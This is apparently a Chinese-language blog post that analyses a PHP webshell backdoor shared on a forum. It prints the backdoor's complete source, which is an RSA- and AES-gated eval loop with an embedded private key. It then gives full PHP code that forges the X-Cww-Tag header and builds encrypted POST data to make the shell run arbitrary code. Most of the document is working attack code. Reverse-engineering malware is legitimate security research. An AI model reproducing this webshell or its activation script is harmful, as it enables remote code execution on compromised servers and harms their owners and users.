PHP后门分析

PHP 后门分析

从吐司上看到一个后门

逆推一下它的利用方式

后门文件如下

<?php
define('EALGO','aes-128-cbc');
define('VERSION','0.1.2'.' '.(md5_file(__FILE__)?md5_file(__FILE__):'-').' '.PHP_VERSION.'/'.PHP_OS.'/'.$_SERVER['SERVER_SOFTWARE']);
define('CWW_SIG','//CWWSUBSCRIPT//');
define('_PRK','LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlDWHdJQkFBS0JnUURSYWVlU1cvaURTZ1RwQjVNcHpXNlJ6N3YxQXlYUUxVbmVsYmt6WVMrU0lTZXRlMEptClRudUtLZWxEV0hPTE5JdG1ORzkraE1HbStsYXR1ZjdWVDl2NExtV28yYVlLOUJpbUZtSmgxbmN3QkNaRkc1U0QKeGJwVkJ3b3pqanZFYWpVaWY5bHZtSFZubE1tYy9xZTF6em9kYjRyS2ZlVUY5SVVMQUxzUkpyYlc1UUlEQVFBQgpBb0dCQUlUYzJGdDNscGhWb2YvbkdtdHZOek96eE9DU2VxODF6S1E0QWlTakNIZUNLWlpibWFrbktpSmlyT2haCmVoVmI1UVdYUnhYU1RMc1FJV1pmbDFybksvdUcvYnMrTjhES21JZUtXd2pHTytyUmlxRnYzY29RTVoyVjZLekcKS2ZsRzFWOSs5MElrZEhtWWFpZzJBRW5tT0ZidTlBYnFwaHFRbE1QK3FXclJTNkFSQWtFQS9qcUZtTUwyRE1wcAozR0MxWndodkd2UTFJR1VoeXNRNThWYXY1VnVobGFFa2ZJeSszb2R4SEJZVGoyUVNKbTRUNVlXN1hXdzU0YTdGCkMzZWdZMEUwSHdKQkFOTGZjY285UDM2Q05jNUZiYTFqOWRtNGdqeHp0aDZNdHdiOEg1czlZTS9vUUpRRVRkbUkKNTVkV3o3NlBrTTNZNHJUVUNoWWZSUXowaVYzRnp0S2p0SHNDUVFDVFk0Uk9vMEVZKzBUU1lqTHBNQWVSL2VETApEamJBSW5GaFRKdWZnamMwMDM2ZXdzNXBudVpoblI3cjg5MWQ4RldTckt5S3BoTU1sMUZmcTVRTjF5Q0xBa0VBCnlFdnBYN254bDQ3QzROemRvcmF5RFUzT2x2RXA2YmFyR3YxY1lDNWF5T0RJaGsvWVNtcFo0RXhiSTV4bVpNQkEKQnBicHhiMko3eFpQYkR5NWlTWnFCUUpCQU94NnJQNE94UTVxMTU2T2FOQ29JSjVqQWhmUElhNGZFM255UG1LOAp5UjlSSlFOQm9LVVRYRTJGNWg4eVYvZWFPRHFDTmpuWEZneTRtN255eExGWmErMD0KLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0K');
error_reporting(0);
@set_time_limit(0);
@ini_set('file_uploads','On');
@ini_set('max_execution_time','0');
@ini_set('max_input_time','600');
@ini_set('upload_max_filesize','32M');
@ini_set('post_max_size','32M');
$_72e=$_SERVER['REQUEST_METHOD'][0]?$_SERVER['REQUEST_METHOD'][0]:'G';
if($_72e=='G' and _indbg('./cwwdebug.data',$_REQUEST['debug']?$_REQUEST['debug']:'-')) {
        _eer(0);
        error_reporting(-1);
        _prdbg();
        exit;
}
if($_72e!='P') {
        _eer(10);
}
$_6f2=false;
foreach($_SERVER as $_911=>$_6f2) {
        if(strtolower($_911)=='http_x_cww_tag') {
                $_6f2=pack("H*",$_6f2);
                break;
        }
}
if($_6f2===false)_eer(20);
$_bb0=false;
$_ed3=openssl_pkey_get_private(array(base64_decode(_PRK),''));
openssl_private_decrypt($_6f2,$_bb0,$_ed3);
if(!$_bb0)_eer(30);
$_5a4=preg_match_all('/^([0-9]{10}):([0-9a-f]{32}):([0-9a-f]{32})$/i',$_bb0,$_086);
if(!$_5a4)_eer(40);
if($_086[1][0]<time())_eer(50);
$_d11=array();
$_d11[0]=pack("H*",$_086[2][0]);
$_d11[1]=pack("H*",$_086[3][0]);
if(eval('return 1;'))$_903=1; else if(is_callable('create_function'))$_903=2; else if(is_callable('file_put_contents'))$_903=3; else _eer(60);
$_056=array();
for ($i=9;$i>=0;$i--) {
        $_81b=_udec($_REQUEST[$i],$_056[$i]);
        if($_81b>0)_eer($_81b+70);
}
if(empty($_056[9]))_eer(80);
while(@ob_end_flush());
$_8fa=32;
ob_start('_out',2);
_eer(0);
for ($i=0;$i<=9;$i++) {
        if(empty($_056[$i]))continue;
        $_a49=false;
        switch($_903) {
                case 1: if(!eval($_056[$i]))$_a49=true;
                break;
                case 2: if(!call_user_func(create_function(null,$_056[$i])))$_a49=true;
                break;
                case 3: $_827=tempnam(sys_get_temp_dir(),time());
                if(file_put_contents($_827,"<?php\n".$_056[$i]."\nreturn false;\n?".'>')) {
                        if(!(include($_827)))$_a49=true;
                        unlink($_827);
                } else {
                        $_a49=true;
                }
                break;
        }
        if($_a49)_eer(90+$i);
}
ob_end_flush();
exit;
function _eer($_c93) {
        if($_c93>0) {
                header("HTTP/1.1 451 $_c93");
                header("X-Cww-Err: $_c93");
        } else {
                header('HTTP/1.1 200 OK');
        }
        header('X-Cww-Capa: '.@ini_get('upload_max_filesize').' '.@ini_get('post_max_size'));
        header('X-Cww-Id: '.VERSION);
        header('Cache-Control: must-revalidate');
        header('Pragma: no-cache');
        header('Expires: Thu,1 Jan 1970 00:00:01 GMT');
        header('Content-Type: text/plain');
        if(!$_c93)return;
        exit;
}
function _dec(&$_782,&$_f97) {
        global $_d11;
        $_f97=openssl_decrypt($_782,EALGO,$_d11[0],false,$_d11[1]);
        return $_f97||false;
}
function _enc(&$_ea7,&$_782) {
        global $_d11;
        $_782=openssl_encrypt($_ea7,EALGO,$_d11[0],false,$_d11[1]);
        return $_782||false;
}
function _unz(&$_f1c,&$_b6c) {
        if(function_exists('gzdecode')) {
                $_b6c=gzdecode($_f1c);
                return $_b6c||false;
        } else if(substr($_f1c,0,3)=="\x1f\x8b\x08") {
                $i=10;
                $_306=ord(substr($_f1c,3,1));
                if($_306>0) {
                        if($_306 & 4) {
                                list($_efa)=unpack('v',substr($_f1c,$i,2));
                                $i=$i+2+$_efa;
                        }
                        if($_306 & 8)$i=strpos($_f1c,"\0",$i)+1;
                        if($_306 & 16)$i=strpos($_f1c,"\0",$i)+1;
                        if($_306 & 2)$i=$i+2;
                }
                $_b6c=gzinflate(substr($_f1c,$i,-8));
                return $_b6c||false;
        }
        return false;
}
function _udec(&$_782,&$_f97) {
        if(empty($_782))return-1;
        $_f1c=false;
        if(!_dec($_782,$_f1c))return 1;
        if(!_unz($_f1c,$_f97))return 2;
        $_1a8=strpos($_f97,CWW_SIG);
        if($_1a8===false||$_1a8!=0)return 3;
        return 0;
}
$_afd='';
$_4fe=0;
function _out($_76c,$_5b9) {
        global $_afd,$_4fe,$_8fa;
        $_afd.=$_76c;
        $_4fe++;
        $_c85=NULL;
        if($_5b9||$_4fe>$_8fa) {
                global $_d11;
                _enc(gzencode($_afd),$_c85,$_d11[0],$_d11[1]);
                $_c85.="\n";
                $_4fe=0;
                $_afd='';
        }
        return $_c85;
}
function _indbg($_e1b,$_9f3) {
        if($_77f=fopen($_e1b,'r')) {
                $_45d=fgets($_77f);
                fclose($_77f);
                return $_9f3==trim($_45d);
        }
        return false;
}
function _prdbg() {
        echo "<html><pre>\n";
        echo "OUR VERSION:\n".VERSION."\n\n";
        echo "GLOBAL VARS:\n";
        print_r($GLOBALS);
        $_cca=array('openssl_pkey_get_private','openssl_private_decrypt','openssl_decrypt','openssl_encrypt','gzdecode','gzencode','gzinflate','create_function','call_user_func','file_put_contents','tempnam',);
        echo "\n\nAVAILABLE FUNCTIONS:\n";
        foreach($_cca as $f) {
                echo "$f():\te:".(function_exists($f)+0).',c:'.(is_callable($f)+0)."\n";
        }
        echo "\n\nCURRENT DIR AND STATS:\n";
        echo(getcwd())."\n";
        print_r(stat('.'));
        echo "\n\nOPENSSL SUPPORTED METHODS:\n";
        print_r(openssl_get_cipher_methods());
        echo "\n\nTHIS SERVER DATE/TIME:\n";
        echo(date('r'));
        if(is_callable('phpinfo')) {
                echo "\n\nPHP INFO:\n";
                ob_start();
                phpinfo();
                $_cfa=ob_get_contents();
                ob_end_clean();
                $_cfa=preg_replace('/<[^>]+>/i',"\t",$_cfa);
                echo "$_cfa\n</pre></html>";
        } else {
                echo "\n\nPHP INFO:(func is not callable)\n";
        }
}
?>

定位到执行代码的地方，这里共需要循环执行十次

设置$_056为

$_056 = array(
    "eval(base64_decode(\$_POST[10]));return 1;",
    "return 1;",
    "return 1;",
    "return 1;",
    "return 1;",
    "return 1;",
    "return 1;",
    "return 1;",
    "return 1;",
    "return 1;",
);

而$_056参数的出处为

for ($i=9;$i>=0;$i--) {
    $_81b=_udec($_REQUEST[$i],$_056[$i]);
    if($_81b>0)_eer($_81b+70);
}

此间用到的函数为，第一处使用aes-128-cbc解密

其中的key和偏移量我们可以自己设置，十六位即可

• $_d11[0]：1234567891234567
• $_d11[1]：1234567891234567

第二个函数存在两处解码，第二种暂不分析，第一种使用的是gzdecode

• 反过来使用gzencode编码即可

function _udec(&$_782,&$_f97) {
    if(empty($_782))return-1;
    $_f1c=false;
    if(!_dec($_782,$_f1c))return 1;
    if(!_unz($_f1c,$_f97))return 2;
    $_1a8=strpos($_f97,CWW_SIG);
    if($_1a8===false||$_1a8!=0)return 3;
    return 0;
}
function _dec(&$_782,&$_f97) {
    global $_d11;
    $_f97=openssl_decrypt($_782,EALGO,$_d11[0],false,$_d11[1]);
    return $_f97||false;
}
function _unz(&$_f1c,&$_b6c) {
    if(function_exists('gzdecode')) {
            $_b6c=gzdecode($_f1c);
            return $_b6c||false;
    } else if(substr($_f1c,0,3)=="\x1f\x8b\x08") {
            $i=10;
            $_306=ord(substr($_f1c,3,1));
            if($_306>0) {
                    if($_306 & 4) {
                            list($_efa)=unpack('v',substr($_f1c,$i,2));
                            $i=$i+2+$_efa;
                    }
                    if($_306 & 8)$i=strpos($_f1c,"\0",$i)+1;
                    if($_306 & 16)$i=strpos($_f1c,"\0",$i)+1;
                    if($_306 & 2)$i=$i+2;
            }
            $_b6c=gzinflate(substr($_f1c,$i,-8));
            return $_b6c||false;
    }
    return false;
}

由于解密出来的数据需要以//CWWSUBSCRIPT//开头，所以更新$_056数据为

$_056 = array(
    "//CWWSUBSCRIPT//
    eval(base64_decode(\$_POST[10]));return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
);

通过代码构造post数据

<?php
$_056 = array(
    "//CWWSUBSCRIPT//
    eval(base64_decode(\$_POST[10]));return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
);
$_056_tmp_1 = array();
foreach ($_056 as $k=>$v){
    if(function_exists('gzencode')){
        $_056_tmp_1[$k] = gzencode($v);
    }
}
$_056_tmp_2 = array();
$aeskey = '1234567891234567';
$aesiv = '1234567891234567';
foreach ($_056_tmp_1 as $k=>$v){
    $_056_tmp_2[$k] = openssl_encrypt($v, "AES-128-CBC", $aeskey, false, $aesiv);
}
$_post_data = '';
foreach ($_056_tmp_2 as $k=>$v){
    $_post_data .= '&'.$k.'='.urlencode($v);
}
$_post_data = substr($_post_data,1);
var_dump($_post_data);

继续向上看代码，这里就说明了key和偏移量的来源

$_086的第一个参数就是时间戳需要大于当前时间，随便设置为2639626859

这个时候就得到了$_bb0的值

而$_bb0是$_6f2通过openssl_private_decrypt解密出来的

私钥已经给了，base64解码_PRK常量即可

提取公钥

使用openssl_private_decrypt的反函数openssl_public_encrypt

完整代码如下

<?php
$_056 = array(
    "//CWWSUBSCRIPT//
    eval(base64_decode(\$_POST[10]));return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
    "//CWWSUBSCRIPT//
    return 1;",
);
$_056_tmp_1 = array();
foreach ($_056 as $k=>$v){
    if(function_exists('gzencode')){
        $_056_tmp_1[$k] = gzencode($v);
    }
}
$_056_tmp_2 = array();
$aeskey = '1234567891234567';
$aesiv = '1234567891234567';
foreach ($_056_tmp_1 as $k=>$v){
    $_056_tmp_2[$k] = openssl_encrypt($v, "AES-128-CBC", $aeskey, false, $aesiv);
}
$_post_data = '';
foreach ($_056_tmp_2 as $k=>$v){
    $_post_data .= '&'.$k.'='.urlencode($v);
}
$_post_data = substr($_post_data,1);
echo "post_data: ".$_post_data."\n";
$_086 = array();
$_086[1][0] = '2639626859';
$_086[2][0] = unpack("H*",'1234567891234567')[1];
$_086[3][0] = unpack("H*",'1234567891234567')[1];
$_bb0 = $_086[1][0].':'.$_086[2][0].":".$_086[3][0];
$pub = '-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDRaeeSW/iDSgTpB5MpzW6Rz7v1
AyXQLUnelbkzYS+SISete0JmTnuKKelDWHOLNItmNG9+hMGm+latuf7VT9v4LmWo
2aYK9BimFmJh1ncwBCZFG5SDxbpVBwozjjvEajUif9lvmHVnlMmc/qe1zzodb4rK
feUF9IULALsRJrbW5QIDAQAB
-----END PUBLIC KEY-----
';
openssl_public_encrypt($_bb0,$data,$pub);
$_6f2 = unpack("H*",$data)[1];
echo "header_data:x-cww-tag: ".$_6f2;

测试

end